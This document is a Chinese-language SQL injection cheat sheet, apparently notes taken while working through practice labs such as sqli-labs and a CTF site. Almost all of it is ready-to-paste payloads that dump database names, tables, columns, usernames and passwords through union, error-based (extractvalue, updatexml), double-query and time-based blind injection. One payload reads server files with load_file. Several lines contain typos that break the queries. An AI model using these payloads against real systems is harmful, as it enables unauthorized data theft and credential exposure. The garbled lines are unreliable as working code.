sql注入语句大全

http://127.0.0.1/Less-2/?id=-1 union select 1,database(),2231 %23//查询当前数据库union select 1,group_concat(schema_name),3 from information_schema.schemata %23
http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),2231 from information_schema.tables where table_schema=database() %23 查询当前数据库的所有表名
http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(column_name),2231 from information_schema.columns where table_schema=database() and table_name=‘users’ %23查询当前数据库里的表的字段
http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users %23查询字段里面的内容

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(schema_name),333 from information_schema.schemata %23查询所有数据库
http://127.0.0.1/Less-2/?id=-1 union select 1,2,3,4 %23 测试列数
order by+数字 测试列数
–+也是注释
and 0 为假
后台语句(id前面的语句)：select username，password，from user where id=???
post注入测试：’’ or 1 %23’
时间盲注 or sleep3 3秒后返回 id=1’ or if((select table_name。。。),sleep(2),0)
SELECT 列名称 FROM 表名称 WHERE 列 运算符 值 、、分析报错
select login_name,password from admin where id=xxx and passwd=6ba8743ee048a220分析报错
id=-1 union select 1,group_concat(table_name),2231 from information_schema.tables where table_schema=database() %23获取当前数据库的所有表名
id=-1 union select 1,group_concat(column_name),2231 from information_schema.clumns where table_name='user’获取表里的字段
id=-1 union select 1,group_concat(column_name),2231 from user 获取字段里面的值

user=1’ or true union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1 %23
http://192.168.8.11/reg.php?user=1%27%20or%20true%20union%20select%20yaoqingma%20from%20%regid%20limit%201,1%23&pass=sdsd&pass2=sdsd&yaoqing=

http://192.168.8.11/reg.php?user=1%27%20or%20true%20union%20select%20yaoqingma%20from%20regid%20limit%201,1%23&pass=sdsd&pass2=sdsd&yaoqing=
查询数据库表名:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

获取字段:
union select 1,1,group_concat(column_name) from information_schema.columns where table_name=‘表明’

获取用户名和密码：
1.union SELECT 列名称 FROM 表名称 WHERE (列 运算符 值 )（查询）
2.union SELECT 1,group_concat(),group_concat() FROM 表名%23
↑合并当前下所有字段的所有数据
http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23
报错注入查询表明http://192.168.8.11/reg.php?user=’ union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) %23 zbh&pass=12345&pass2=12345&yaoqing=
http://192.168.8.11/reg.php?user=’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) %23 zbh&pass=12345&pass2=12345&yaoqing=
报错注入查询字段http://192.168.8.11/reg.php?user=’ union select 1,extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘regid’ limit 2,1))) %23 zbh&pass=12345&pass2=12345&yaoqing=
拨错注入查询字段内容http://192.168.8.11/reg.php?user=’ union select 1,extractvalue(1,concat(0x7e,(select yaoqingma from regid))) %23 zbh&pass=12345&pass2=12345&yaoqing=
双注入表明uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database()limit 0,1 )) %23 &passwd=123&submit=Submit
字段uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_name=‘emails’ limit 1,1 )) %23 &passwd=123&submit=Submit
读取http://192.168.8.22/Less-1/index.php?id=-1’ union select 1,2, hex(load_file(“d:\xampp\htdocs\Less-1\index.php”)) %23
字段内容http://192.168.8.23/vul/sqli/sqli_del.php?id=70 or updatexml(2,concat(0x7e,(select email from member limit 0,1)),0)
limit注入：http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mydbs.user limit 2,1))),1)%23&num=1